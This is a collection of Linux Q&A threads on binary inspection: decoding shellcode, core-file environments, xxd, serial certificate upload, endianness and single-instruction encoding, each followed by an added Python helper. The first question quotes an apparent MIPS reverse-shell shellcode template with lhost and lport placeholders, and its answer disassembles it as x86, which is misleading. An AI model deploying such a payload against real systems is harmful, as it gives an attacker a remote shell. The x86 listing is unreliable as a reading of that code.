how to decode shellcode to ascii - linux

I have some shellcode that, when I convert it to ASCII, doesn't output text; it's just gibberish.
\x24\x11\xff\xff\x24\x04\x27\x0f\x24\x02\x10\x46\x01\x01\x01\x0c\x1e\x20\xff\xfc\x24\x11\x10\x2d\x24\x02\x0f\xa2\x01\x01\x01\x0c\x1c\x40\xff\xf8\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0\x3c\x0e + lport +\x35\xce + lport +\xaf\xae\xff\xe4\x3c\x0e + lhost[:2] +\x35\xce + lhost[2:4] +\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x0f\xff\xfd\x01\xe0\x78\x27\x8f\xa4\xff\xff\x01\xe0\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff\x21\xef\xff\xff\x15\xf0\xff\xfa\x28\x06\xff\xff\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c
I tried decoding it multiple ways with the same output. Is there any other way to decode this?

You can disassemble it using a Python one-liner piped into the ndisasm tool.
e.g. python -c 'print "\x24\x11\xff\xff\x24\x04\x27\x0f"' | ndisasm -u -
Result:
00000000 2411 and al,0x11
00000002 FF db 0xff
00000003 FF2404 jmp [esp+eax]
00000006 27 daa
00000007 0F db 0x0f
00000008 0A db 0x0a

You could use Cutter, which is a debugging / dumping tool for all kinds of files.
You can make a file, e.g.:
touch script.sh
then type your shellcode into the file and run, e.g., cutter script.sh. If you don't know how to use the individual tools in the CLI and want more information in one place than only the disassembly from:
python -c 'print "\x24\x11\xff\xff\x24\x04\x27\x0f"' | ndisasm -u -
then Cutter is a great tool for showing you information quickly and easily.
Cutter:
https://cutter.re/
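The reason "decoding to ASCII" fails is that the string above is machine code, not text, so the useful first step is to turn the \xNN notation into raw bytes that a disassembler (ndisasm, objdump, Cutter) can load. The helper below is an added example, not code from the question or either answer: it parses the escaped notation, tolerates the "+ lport +" style placeholders the question's string contains (you supply the bytes for them), reports how little of the buffer is printable, and writes the bytes out without the trailing newline that a Python 2 print appends (the stray 0A at the end of the ndisasm listing above comes from exactly that). The sample string is a constructed excerpt of the question's shellcode, and the fill bytes for lport are made up.

```python
import re

# Constructed sample in the question's notation: a few escaped bytes plus the
# "+ lport +" placeholder fragments that the question's string contains.
SAMPLE = (r"\x24\x11\xff\xff\x24\x04\x27\x0f\x24\x02\x10\x46\x01\x01\x01\x0c"
          r"\x3c\x0e + lport +\x35\xce + lport +\xaf\xae\xff\xe4")

# One token is either a \xNN escape or a "+ name +" placeholder; the name may
# carry a slice such as lhost[:2], as in the question.
TOKEN_RE = re.compile(r"\\x([0-9a-fA-F]{2})|\+\s*([A-Za-z_][\w\[\]:]*)\s*\+")


def parse_escaped(text, fills=None):
    """Turn "\\xNN" text into raw bytes.

    fills maps placeholder names (e.g. "lport") to the bytes that belong there.
    Anything that is neither an escape nor a known placeholder raises, so a
    typo cannot silently drop bytes from the buffer.
    """
    fills = fills or {}
    out = bytearray()
    pos = 0
    for m in TOKEN_RE.finditer(text):
        gap = text[pos:m.start()]
        if gap.strip():
            raise ValueError("unparsed text at offset %d: %r" % (pos, gap))
        if m.group(1) is not None:
            out.append(int(m.group(1), 16))
        else:
            name = m.group(2)
            if name not in fills:
                raise ValueError("no fill for placeholder %r" % name)
            out += fills[name]
        pos = m.end()
    if text[pos:].strip():
        raise ValueError("unparsed trailing text: %r" % text[pos:])
    return bytes(out)


def printable_ratio(data):
    """Fraction of bytes in the printable ASCII range 0x20..0x7e."""
    if not data:
        return 0.0
    return sum(0x20 <= b <= 0x7e for b in data) / len(data)


def hexdump(data, width=16):
    """hd-style lines: offset, hex bytes, ASCII column with '.' for non-printables."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in chunk).ljust(width * 3 - 1)
        asc = "".join(chr(b) if 0x20 <= b <= 0x7e else "." for b in chunk)
        lines.append("%08x  %s  |%s|" % (off, hexpart, asc))
    return lines


def write_raw(data, path):
    """Write the bytes exactly, with no trailing newline (unlike a Python 2 print)."""
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    # The lport fill is a constructed value, not taken from the question.
    raw = parse_escaped(SAMPLE, fills={"lport": b"\x11\x5c"})
    print("%d bytes, printable ratio %.2f" % (len(raw), printable_ratio(raw)))
    for line in hexdump(raw):
        print(line)
    write_raw(raw, "shellcode.bin")  # feed this file to your disassembler
```

A printable ratio around a third, as here, is typical of machine code and is the quick check that tells you to reach for a disassembler rather than a text decoder; the .bin file it writes can be given to objdump -D -b binary with the right -m architecture, or opened in Cutter, without the extra newline byte.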

How can I examine a process' image?

First I find the process' pid with ps:
% ps -a | grep 'a.out'
output:
36296 pts/0 00:00:07 a.out
Then I get an image of this process with gcore:
% sudo gcore 36296
output:
0x0000558eab27d131 in main ()
warning: Memory read failed for corefile section, 4096 bytes at 0xffffffffff600000.
Saved corefile core.36296
[Inferior 1 (process 36296) detached]
Then, hex dump object:
% hd core.36296 | grep 'HOME'
output:
001f4a90 3d 32 00 48 4f 4d 45 3d 2f 68 6f 6d 65 2f 63 61 |=2.HOME=/home/ca|
Now I'm trying to find the section where the environment variables are loaded. How can I do this?
You should use a debugger!
For Linux, gcc and gdb you can do:
> gdb <executable> <core-file>
Within gdb you now can examine the environment from the core file:
(gdb) print ((char**)__environ)[0]
$1 = 0x7ffc6aba0a58 "SHELL=/bin/bash"
(gdb) print ((char**)__environ)[1]
$2 = 0x7ffc6aba0a68 "SESSION_MANAGER=local/unix:#/tmp/.ICE-unix/1873,unix/unix:/tmp/.ICE-unix/1873"
unless you get a string with length 0.
If you do not have an executable with debug info, you can also try to find the text with:
strings -a <core-file>
But before you write a core file and search in it, you can simply get the environment from a process by using ps if your program is still running:
ps eww <pid>
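When there is no debug info and the gdb route is closed, the environment block is still recognisable in the core file: it is a run of NUL-terminated KEY=VALUE strings sitting next to each other, which is what the hd | grep 'HOME' hit above landed on. The scanner below is an added example, not code from the question or the answer: it finds such runs in an arbitrary blob, groups consecutive entries so a single KEY=VALUE-looking string elsewhere in memory is not mistaken for the environment, and also parses the NUL-separated format that /proc/<pid>/environ uses for a live process. The core-file bytes are a constructed stand-in, not a real core.

```python
import re

# Constructed stand-in for a slice of a core file: filler bytes, then the
# environment block, then a decoy that looks similar but is not NUL-delimited.
SAMPLE_CORE = (b"\x7fELF\x02\x01\x01" + bytes(range(64)) * 2 + b"\x00" +
               b"SHELL=/bin/bash\x00HOME=/home/ca\x00LANG=C.UTF-8\x00" +
               b"\x00" * 8 + b"x/y=z\x00" + b"\xff" * 16)

# An entry is an identifier, '=', printable bytes, then NUL. The lookbehind
# requires it to start at the buffer start or right after another NUL, so the
# tail of a longer string ("HELL=/bin/bash") is not reported as an entry.
ENV_RE = re.compile(rb"(?<![^\x00])([A-Za-z_][A-Za-z0-9_]*=[\x20-\x7e]*)\x00")


def find_env_entries(blob, min_run=2):
    """Return runs of consecutive KEY=VALUE\\0 strings as [[(offset, entry), ...], ...].

    Only runs of at least min_run entries are returned: a lone match is more
    likely a stray string than the process's environment block.
    """
    hits = [(m.start(1), m.group(1).decode("ascii")) for m in ENV_RE.finditer(blob)]
    runs, cur = [], []
    for off, entry in hits:
        # consecutive means this entry starts right after the previous NUL
        if cur and off == cur[-1][0] + len(cur[-1][1]) + 1:
            cur.append((off, entry))
        else:
            if len(cur) >= min_run:
                runs.append(cur)
            cur = [(off, entry)]
    if len(cur) >= min_run:
        runs.append(cur)
    return runs


def parse_environ_block(data):
    """Parse the NUL-separated block /proc/<pid>/environ gives for a live process."""
    env = {}
    for item in data.split(b"\x00"):
        if b"=" in item:
            key, _, value = item.partition(b"=")
            env[key.decode("latin-1")] = value.decode("latin-1")
    return env


def main():
    for run in find_env_entries(SAMPLE_CORE):
        print("environment block at 0x%x:" % run[0][0])
        for off, entry in run:
            print("  %08x  %s" % (off, entry))
    # Live-process counterpart of `ps eww <pid>`, when /proc is available.
    try:
        with open("/proc/self/environ", "rb") as f:
            print("live entries in this process:", len(parse_environ_block(f.read())))
    except OSError:
        pass


if __name__ == "__main__":
    main()
```

Run it over a real core with open(path, "rb").read() in place of SAMPLE_CORE; expect one long run near the top of the stack mapping, and treat short runs elsewhere (copies made by getenv callers, library buffers) as leads rather than the block itself.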

How do you get plain text from binary where the plaintext is formatted by itself?

Desired output of something like "xxd -b file":
00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000
..etc
then followed by
plaintext here
Actual output:
00000000 00000000 00000000 00000000 plai
00000000 00000000 00000000 00000000 n te
00000000 00000000 00000000 00000000 xt h
Hopefully this communicates what I'm getting at. This is just a minor issue I encountered doing a beginner CTF, but it felt very off and sloppy to copy-paste just one line at a time, since highlighting treats the actual information I want in the right column as just part of the array of text. I've tried a few different flags with xxd and read the man page, but I have not found an option that outputs the plaintext by itself or in a manner that is more readable. Is there another tool I should be using, ideally one that is common on most Linux distros?
Process the file twice, once by xxd, once by cat. Use cut to remove the plaintext from the xxd output:
xxd -b file | cut -d' ' -f1-8 ; cat file
Use 2-8 if you aren't interested in the positions.
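The cut trick works because xxd -b emits a fixed layout: an 8-digit offset, six 8-bit groups separated by single spaces, then two spaces and the text column. The code below is an added example, not from the question or the answer, that produces that layout itself (the text column is optional) and parses it back into bytes using the fixed column widths rather than counting space-separated fields, so a plaintext column that happens to contain eight binary digits cannot be mistaken for a bit group. The input bytes are constructed.

```python
import re

# Constructed input: a short text whose last line will be partial.
SAMPLE = b"Hello, world!"


def xxd_b(data, show_text=True, cols=6):
    """Lines laid out like `xxd -b`: offset, cols bytes as 8-bit groups, ASCII column."""
    lines = []
    width = 10 + cols * 9 - 1          # offset + ": " + groups and their separators
    for off in range(0, len(data), cols):
        chunk = data[off:off + cols]
        bits = " ".join(format(b, "08b") for b in chunk)
        line = "%08x: %s" % (off, bits)
        if show_text:
            text = "".join(chr(b) if 0x20 <= b <= 0x7e else "." for b in chunk)
            line = line.ljust(width) + "  " + text
        lines.append(line)
    return lines


def parse_xxd_b(lines, cols=6):
    """Recover the bytes from xxd -b style lines, ignoring the text column."""
    out = bytearray()
    for line in lines:
        head = line[10:10 + cols * 9]    # fixed-width slice: bit groups and padding only
        out.extend(int(group, 2) for group in re.findall(r"[01]{8}", head))
    return bytes(out)


def split_dump(data):
    """The two-pass idea from the answer in one call: bit dump without the text
    column, followed by the plaintext as its own block."""
    return xxd_b(data, show_text=False), data.decode("latin-1")


if __name__ == "__main__":
    dump, text = split_dump(SAMPLE)
    print("\n".join(dump))
    print()
    print(text)
```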

Transferring a TLS/SSL certificate via serial

I need to send a PEM-formatted certificate for storage on a module that can be communicated with through the AT command set via a serial interface on one of the Linux device nodes in /dev.
So far I've been using mostly
echo 'AT' > /dev/ttyX
to issue the necessary commands and it has done the trick just fine.
Any output from the device is monitored with cat /dev/ttyX on another terminal window.
I now have a certificate file encoded with ANSI. The documentation tells me to input it to the module using only LF line breaks and to terminate the input with Ctrl+Z, which I believe is hex 0x1A. The document also specifies that the certificate file may not end with an EOF character. I have used a hex editor to verify that the file is formatted as it should be.
I've tried to use both echo and printf to send the certificate chars / string to the module.
I have tried to include the 0x1A character in both the file and send it separately after the certificate chars like so:
printf '\x1a' > /dev/ttyX
or alternatively
echo -n -e '\x1a' > /dev/ttyX
The module seems to acknowledge the 0x1A as it stops the >-prompt for certificate and gives me the most verbose reply ever: ERROR
Generally, I'm sending the certificate file contents as follows:
echo -e "$(cat certfile)" > /dev/ttyX
or
printf '%b' "$(cat certfile)" > /dev/ttyX
Please assume that I have access to basic Linux shell tools (such as echo, printf, nano, stty and so on) with no option to trivially install new ones. I use SSH to access the target device and pscp to transfer the file to the target device. I also have a Windows rig on the side.
Any suggestions what else I should take into consideration? Maybe an stty option that I've missed? Does cat do something nasty in the input phase? A revealing trick to investigate the actual character data about to be sent to the module? Some weird kink with serial comms I've missed?
If I
printf '%b' "$(cat cert)" > ./testoutput
and
od -x testoutput
the file looks alright in hex (I reordered the output from od -x manually; it seems to make pairs of the hex digits and swap them around). For example, the end is:
2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 1a 00
There must be something in stty or the receiving end that's causing trouble. Right?
For example the end is:
2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 00 1a
Wait a sec. What's that 00 doing there, right before the 1a?
That doesn't belong. Try removing it.
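Two things in the exchange above are worth having as a repeatable check rather than a manual od reading: od -x prints 2-byte units in host byte order, so on a little-endian machine the bytes inside each pair appear swapped, whereas od -An -tx1 -v prints one byte at a time in file order; and bash command substitution ($(cat certfile)) drops NUL bytes (newer versions print a warning) and strips trailing newlines, so what reaches the device is not necessarily what the file contains. The script below is an added example, not from the question or the answer, that lists the defects in a certificate file that such a module would choke on (CR line endings, NUL or other control bytes, a Ctrl+Z already inside the file, a missing END line), builds the LF-only payload terminated by a single 0x1A, and shows the tail in file order. The certificate text is constructed and not a real certificate.

```python
import re

# Constructed PEM-like file with two of the defects discussed: CRLF line
# endings and a stray NUL at the end. Not a real certificate.
SAMPLE_CERT = (b"-----BEGIN CERTIFICATE-----\r\n"
               b"MIIBszCCAVmgAwIBAgIUAAAA\r\n"
               b"-----END CERTIFICATE-----\r\n\x00")

CTRL_Z = b"\x1a"


def check_cert_bytes(data):
    """Return a list of human-readable problems found in the raw file bytes."""
    problems = []
    if b"\r" in data:
        problems.append("CR (0x0d) present: line endings are not LF-only")
    if b"\x00" in data:
        problems.append("NUL (0x00) present at offset %d" % data.index(b"\x00"))
    if CTRL_Z in data:
        problems.append("Ctrl+Z (0x1a) already inside the file at offset %d" % data.index(CTRL_Z))
    bad = sorted(b for b in set(data)
                 if b not in (0x0a, 0x0d, 0x00) and not 0x20 <= b <= 0x7e)
    if bad:
        problems.append("non-ASCII/control bytes: " + ", ".join("%02x" % b for b in bad))
    normalized = data.replace(b"\r\n", b"\n").rstrip(b"\x00")
    if not re.search(rb"-----END [A-Z ]+-----\n?$", normalized):
        problems.append("file does not end with the PEM END line")
    return problems


def prepare_payload(data):
    """LF-only text, no NULs, exactly one LF after the END line, then Ctrl+Z."""
    text = data.replace(b"\r\n", b"\n").replace(b"\r", b"\n").replace(b"\x00", b"")
    text = text.rstrip(b"\n") + b"\n"
    return text + CTRL_Z


def hex_tail(data, n):
    """The last n bytes in file order, the way `od -An -tx1 -v` would show them."""
    return " ".join("%02x" % b for b in data[-n:])


def main(src="certfile", dst="payload.bin"):
    with open(src, "rb") as f:
        data = f.read()
    for problem in check_cert_bytes(data):
        print("problem:", problem)
    payload = prepare_payload(data)
    with open(dst, "wb") as f:        # send with: cat payload.bin > /dev/ttyX
        f.write(payload)
    print("payload tail:", hex_tail(payload, 8))


if __name__ == "__main__":
    main()
```

Writing the prepared payload to a file and sending it with cat, rather than through echo or printf with a $(cat ...) substitution, sidesteps the shell's NUL and newline handling entirely; the tail should read ... 2d 0a 1a with nothing after the 1a.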

Differences between objdump and xxd

I am trying to find a call function in a binary file, so I tried this:
Compile my code (in C),
Use the command: mips-mti-linux-gnu-objdump -d myapp.elf > objdump.txt
My function in objdump.txt file: 9d003350: 42000828 myfunction 0x1
Now, I want to identify this function in myapp.bin when reading this from memory. But, I get this: 28080042.
I tried to use the command: xxd -ps myapp.bin > xxd.txt
I can only find: 28080042.
Is it possible to do that?
That's an endianness conflict. objdump and xxd are giving you the same bytes, they're just using different endianness.
Actual bytes in order:
28 08 00 42
Big endian value:
28 08 00 42
Little endian value:
42 00 08 28
xxd -p will print out the individual bytes in the file in the order in which they exist.
objdump is disassembling it; it knows that the bytes belong in groups of 4, and it's interpreting them as little-endian.
xxd can print in little-endian order, using the -e flag (with a default grouping of 4 bytes, use the -g flag to change the number of bytes per group). However, this is incompatible with the -p flag, because the -p flag ignores any grouping.
objdump can be made to print in big-endian order using the -EB flag; however, this will affect what instructions it reports.
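The conversion between the two views is mechanical once you treat the objdump column as a 32-bit word and the xxd -p output as the bytes that word occupies in the file. The code below is an added example, not from the question or the answer: it packs a word in either byte order, shows the xxd -p and objdump-style renderings of a buffer, and searches a raw image for a word in both orders at 4-byte alignment, which is the check to run when an instruction from the ELF disassembly cannot be found in the .bin. The image bytes are constructed around the question's word 0x42000828; the filler words are not from the page.

```python
import struct

# Constructed stand-in for a raw image: filler words plus the question's
# instruction word 0x42000828 stored little-endian at offset 8.
TARGET_WORD = 0x42000828
SAMPLE_BIN = (struct.pack("<I", 0x3c1c0000) + struct.pack("<I", 0x279c0000) +
              struct.pack("<I", TARGET_WORD) + struct.pack("<I", 0x03e00008))


def word_to_bytes(word, little_endian=True):
    """The byte sequence a 32-bit instruction word occupies in the file."""
    return struct.pack("<I" if little_endian else ">I", word)


def xxd_p_view(data):
    """What `xxd -p` prints: every byte in file order as plain hex."""
    return data.hex()


def objdump_words(blob, little_endian=True):
    """Words as objdump (or `xxd -e -g4`) shows them: 4-byte groups in the
    target's byte order; a trailing partial word is ignored."""
    count = len(blob) // 4
    fmt = ("<" if little_endian else ">") + "I" * count
    return ["%08x" % w for w in struct.unpack(fmt, blob[:count * 4])]


def find_word(blob, word):
    """4-byte-aligned offsets where `word` appears, checked in both byte orders."""
    hits = {}
    for name, fmt in (("little", "<I"), ("big", ">I")):
        needle = struct.pack(fmt, word)
        hits[name] = [off for off in range(0, len(blob) - 3, 4)
                      if blob[off:off + 4] == needle]
    return hits


if __name__ == "__main__":
    print("xxd -p  :", xxd_p_view(SAMPLE_BIN))
    print("objdump :", " ".join(objdump_words(SAMPLE_BIN)))
    print("LE bytes:", word_to_bytes(TARGET_WORD).hex())
    print("BE bytes:", word_to_bytes(TARGET_WORD, False).hex())
    print("found at:", find_word(SAMPLE_BIN, TARGET_WORD))
```

If the little-endian search hits and the big-endian one does not, the image is stored in the order objdump assumed and the function is simply at that offset; if neither hits, the .bin is not a straight dump of the .text section (a header, compression, or a different load layout is in the way), which is a different problem from byte order.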

How to simply get a machine code of exactly one assembly instruction?

How to simply get a code of exactly one assembly instruction?
For example for "mov eax 0x14".
I want to get it in a Linux terminal, preferably with gcc or gdm.
$ echo "mov eax, 0x14" | as -o /dev/null -al -msyntax=intel -mnaked-reg
GAS LISTING page 1
1 0000 B8140000 mov eax,0x14
1 00
rasm2 from the radare2 package fits this purpose nicely:
$ rasm2 'nop'
90
$ rasm2 -d '90'
nop
http://radare.org/y/?p=examples&f=rasm
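The listing above shows where the five bytes come from: mov r32, imm32 is encoded as opcode byte B8 plus the register's index, followed by the 32-bit immediate in little-endian order, which is why "mov eax, 0x14" becomes B8 14 00 00 00 (the GAS listing wraps the last 00 onto its own line). The code below is an added example, not from the question or either answer, that encodes and decodes exactly that instruction form for all eight 32-bit general registers plus nop, so you can see the encoding rule rather than only its output for eax. It is deliberately a toy covering only these forms; anything else raises.

```python
import struct

# 32-bit general registers and the index added to the B8 opcode byte.
REG32 = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3,
         "esp": 4, "ebp": 5, "esi": 6, "edi": 7}
INDEX_TO_REG = {i: r for r, i in REG32.items()}


def encode(instr):
    """Machine code for one Intel-syntax instruction from a tiny subset:
    'nop' and 'mov <reg32>, <imm>'. Anything else raises ValueError."""
    text = instr.strip().lower()
    if text == "nop":
        return b"\x90"
    mnemonic, _, operands = text.partition(" ")
    if mnemonic == "mov":
        parts = [p.strip() for p in operands.split(",")]
        if len(parts) == 2 and parts[0] in REG32:
            imm = int(parts[1], 0)          # accepts 0x14, 20, -1, ...
            # B8+rd id: opcode byte B8 plus register index, then imm32 little-endian
            return bytes([0xB8 + REG32[parts[0]]]) + struct.pack("<I", imm & 0xFFFFFFFF)
    raise ValueError("unsupported instruction: %r" % instr)


def decode(code):
    """Inverse of encode() for the same subset."""
    if code == b"\x90":
        return "nop"
    if len(code) == 5 and 0xB8 <= code[0] <= 0xBF:
        reg = INDEX_TO_REG[code[0] - 0xB8]
        return "mov %s, 0x%x" % (reg, struct.unpack("<I", code[1:])[0])
    raise ValueError("unsupported encoding: %s" % code.hex())


if __name__ == "__main__":
    for instr in ("mov eax, 0x14", "mov edi, 1", "mov ebx, -1", "nop"):
        code = encode(instr)
        print("%-16s %s   (%s)" % (instr, code.hex(" "), decode(code)))
```

Compare the output of the first line with the B8140000 00 in the GAS listing, and with what rasm2 'mov eax, 0x14' prints; the register index is the only thing that changes between eax and edi, which is a quick way to sanity-check a disassembler's output for this instruction family.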